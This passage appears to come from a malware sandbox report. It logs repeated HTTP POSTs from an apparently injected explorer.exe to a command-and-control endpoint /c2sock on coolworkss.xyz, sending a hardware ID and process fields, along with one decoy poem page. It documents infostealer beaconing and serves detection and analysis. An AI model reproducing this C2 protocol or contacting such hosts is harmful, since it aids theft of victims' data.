                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:43.156150103 CEST2849INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:43 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=aupmij179tbg6l5nm2r2vls970; expires=Sat, 30 Dec 2023 04:49:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f%2BmBL9ogH7BQ48w7%2F8KXH5rmAoi6CU1P6FVMYjG0iBC%2FZvIwsvgMZqdrE13JyAkQ1LwsA7xdUZoWVfWurJD2o1p2xIJrW8Kt2QKa4QCUs%2B898j4ZUesD%2FyURqorX9TAvZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb45780d21df-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:43.156187057 CEST2849INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    26192.168.2.449760104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:43.547434092 CEST2850OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:43.548638105 CEST2851OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:43.981542110 CEST2852INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:43 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=rn8fkrimtkhh8gdnf6qhl4f1sl; expires=Sat, 30 Dec 2023 04:49:22 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eatcrtzjXNk%2Fl952jeEkZ6iikvy7o973NxHz7JN3eYFsyAOrDOzLxQgnoKU21DcOsm2CqquptP%2BXRI3yNSV2rQ8X8DYeWwIws5ksA0mTu6H7UnJSbItslAHoFlmOO11UuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb4a9d965730-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:43.981659889 CEST2852INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    27192.168.2.449761172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:44.424302101 CEST2852OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:44.425565004 CEST2853OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:44.868376017 CEST2854INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:44 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=dgivu4vmgifromg3ckio560shd; expires=Sat, 30 Dec 2023 04:49:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FgAU13z%2FPiSvPA7RsGj3miZupT922PW%2B8VQ0dfC900HSwhd9MYvMfM%2B%2BNLp7Klz3P%2B3VhpehDS%2B96fqQWI0OWvwu%2Bg%2BuzsIJZ7QcHG8PYXhM5V6dVvTCnTgwR6U6nA1TpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb500aee497c-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:44.868418932 CEST2854INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    28192.168.2.449762172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:45.194621086 CEST2855OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:45.197458029 CEST2855OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:45.621404886 CEST2856INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:45 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=ne98cocuct2jdj9ftdchg8dru7; expires=Sat, 30 Dec 2023 04:49:24 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lezCIDeGBM%2FxGOQFhMQFCE1t98uXULhB4vE7q1Aq1KYE8Iet7%2F7oTgysBDIMJ%2BWuDR98UgQHgE2EbV6C83pkuJyOn0YibMrIYWeH7V%2FM3GZPrjsBBD5h4MgUI3E8tpvwAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb54df6e9aec-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:45.621473074 CEST2856INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    29192.168.2.449763172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:45.963816881 CEST2857OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:45.965296984 CEST2857OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:46.380932093 CEST2858INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=nb6f4pddq7cc7jk6b2hivdual4; expires=Sat, 30 Dec 2023 04:49:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ngEum6q%2FBslfzGFq%2FOAy%2Fl0RM0kQHcV6vpdu1iDWA%2B%2B1GAPEPeCeY2s9Q8pc23eSNtbKpMGomO90vwqFxY22D4HgKQ%2FcwD5b%2BfLTdJEGxCr85dxlD35d7iz%2F%2BWNBI2AJYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb59ab49572a-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:46.381072998 CEST2858INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    3192.168.2.449737172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:23.053628922 CEST2756OUTGET / HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:23.431405067 CEST2757INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:23 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Last-Modified: Sat, 01 Jul 2023 17:37:18 GMT
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xAjjPYBv7f02bcTnmOaDXOg4TVMRVz6g14oAfLvZznOLEwrteCk8C6IjIvhPbM%2BTFkmz9eBNf6tn7hyzfGmzJcokksnHNdtbxEiz%2BUBgro1emV6f9X0MbSDnewubo4%2FxxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfaca7eae9ae9-MIA
                                                                                                                                                    Data Raw: 61 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 95 d1 81 d0 b5 d0 bd d0 b8 d0 bd 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 6c 65 66 74 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 72 75 73 74 69 68 2e 72 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 35 2f 31 32 2f 73 65 72 67 65 79 2d 65 73 65 6e 69 6e 2d 73 74 69 68 69 2d 32 30 37 78 33 30 30 2e 6a 70 67 22 2f 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 20 31 35 70 78 3b 77 69 64 74 68 3a 20 36 30 30 70 78 3b 22 3e 0a 20 20 20 20 3c 68 31 3e d0 a1 d0 b5 d1 80 d0 b3 d0 b5 d0 b9 20 d0 95 d1 81 d0 b5 d0 bd d0 b8 d0 bd 20 e2 80 94 20 d0 a2 d1 8b 20 d0 bc d0 b5 d0 bd d1 8f 20 d0 bd d0 b5 20 d0 bb d1 8e d0 b1 d0 b8 d1 88 d1 8c 2c 20 d0 bd d0 b5 20 d0 b6 d0 b0 d0 bb d0 b5 d0 b5 d1 88 d1 8c 3c 2f 68 31 3e 0a 3c 62 72 3e 3c 2f 62 72 3e 20 20 20 20 0a d0 a2 d1 8b 20 d0 bc d0 b5 d0 bd d1 8f 20 d0 bd d0 b5 20 d0 bb d1 8e d0 b1 d0 b8 d1 88 d1 8c 2c 20 d0 bd d0 b5 20 d0 b6 d0 b0 d0 bb d0 b5 d0 b5 d1 88 d1 8c 2c 0a d0 a0 d0 b0 d0 b7 d0 b2 d0 b5 20 d1 8f 20 d0 bd d0 b5 d0 bc d0 bd d0 be d0 b3 d0 be 20 d0 bd d0 b5 20 d0 ba d1 80 d0 b0 d1 81 d0 b8 d0 b2 3f 0a d0 9d d0 b5 20 d1 81 d0 bc d0 be d1 82 d1 80 d1 8f 20 d0 b2 20 d0 bb d0 b8 d1 86 d0 be 2c 20 d0 be d1 82 20 d1 81 d1 82 d1 80 d0 b0 d1 81 d1 82 d0 b8 20 d0 bc d0 bb d0 b5 d0 b5 d1 88 d1 8c 2c 0a d0 9c d0 bd d0 b5 20 d0 bd d0 b0 20 d0 bf d0 bb d0 b5 d1 87 d0 b8 20 d1 80 d1
                                                                                                                                                    Data Ascii: a11<!DOCTYPE html><meta charset="UTF-8"><html><head> <title></title> <style type="text/css"> *{ margin: 0; padding: 0; } </style></head><body><img style="float:left;" src="https://rustih.ru/wp-content/uploads/2015/12/sergey-esenin-stihi-207x300.jpg"/><div style="float: left;margin: 15px;width: 600px;"> <h1> , </h1><br></br> , , ? , ,
                                                                                                                                                    Sep 5, 2023 13:02:23.431504965 CEST2758INData Raw: 83 d0 ba d0 b8 20 d0 be d0 bf d1 83 d1 81 d1 82 d0 b8 d0 b2 2e 0a 3c 62 72 3e 3c 2f 62 72 3e 0a d0 9c d0 be d0 bb d0 be d0 b4 d0 b0 d1 8f 2c 20 d1 81 20 d1 87 d1 83 d0 b2 d1 81 d1 82 d0 b2 d0 b5 d0 bd d0 bd d1 8b d0 bc 20 d0 be d1 81 d0 ba d0 b0
                                                                                                                                                    Data Ascii: .<br></br>, , . , ?
                                                                                                                                                    Sep 5, 2023 13:02:23.431525946 CEST2759INData Raw: d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 2c 20 d1 8f 20 d0 b2 d1 8b d0 b9 d0 b4 d1 83 20 d0 bd d0 b0 20 d0 bf d1 80 d0 be d0 b3 d1 83 d0 bb d0 ba d1 83 2c 0a d0 98 20 d1 81 20 d1 82 d0 be d0 b1 d0 be d1 8e 20 d0 b2 d1 81 d1 82 d1 80 d0
                                                                                                                                                    Data Ascii: , , .<br></br> ,
                                                                                                                                                    Sep 5, 2023 13:02:23.431546926 CEST2759INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    30192.168.2.449764104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:46.712899923 CEST2859OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:46.714171886 CEST2860OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:47.141078949 CEST2860INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:47 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=j76gsi6t2gdcvfqgav7frob290; expires=Sat, 30 Dec 2023 04:49:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fqZI4Vi4J5H3VJHujZ6N%2BZfxrOySrDnPzIwzZ5DyFZcRcFW%2FaKjDO%2BSYqLxEJu915bNzmU%2FAfmD8jIHe5K8t0pYDymU6xrF0D008eVLJZejcIuOSu14laC9gKkl0p3f7tQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb5e5928031c-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:47.141140938 CEST2861INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    31192.168.2.449765104.21.60.11180C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:02:47.441241980 CEST2861OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:02:47.443515062 CEST2862OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:02:47.918494940 CEST2863INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:02:47 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=737lrrh8lveic79dbtmko0afmg; expires=Sat, 30 Dec 2023 04:49:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vS0AzCa%2F%2Bcrwu89RDWc%2BY7zOMHLWBm6rbYvyaflO%2F04tQOKY%2B2r9YY1vaJ0TtWGBaMBiOF3IhxY%2FCAuw%2B48ydsWsgtC56He9EY6eHYJFZ4ZUgpoBtBSFKtmu1IRi7NjwQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfb62e93b287e-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:02:47.918539047 CEST2863INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    32192.168.2.449766172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:03:03.401012897 CEST2864OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                                                                    User-Agent: TeslaBrowser/5.5
                                                                                                                                                    Content-Length: 450
                                                                                                                                                    Host: coolworkss.xyz
                                                                                                                                                    Sep 5, 2023 13:03:03.403244972 CEST2864OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32
                                                                                                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
                                                                                                                                                    Sep 5, 2023 13:03:03.799978018 CEST2865INHTTP/1.1 200 OK
                                                                                                                                                    Date: Tue, 05 Sep 2023 11:03:03 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    X-Powered-By: PHP/8.2.7
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Set-Cookie: PHPSESSID=73g817df6egcef86qu9m3112pq; expires=Sat, 30 Dec 2023 04:49:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oAiHoT%2BWxQpQA2636vtu02kRORzmFERCHhKCffxf7kAXesHxi23gGeJYZ%2FlRtI6Sw0rCFX9hmsLmmeuAecWOj9pwAC3TXTMlu3EPtC0qnObo89ZsP45B9e2zfMVsMmbe4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 801dfbc6adabd9a1-MIA
                                                                                                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                    Sep 5, 2023 13:03:03.800081968 CEST2865INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    33192.168.2.449767172.67.195.22980C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Sep 5, 2023 13:03:04.133225918 CEST2866OUTPOST /c2sock HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
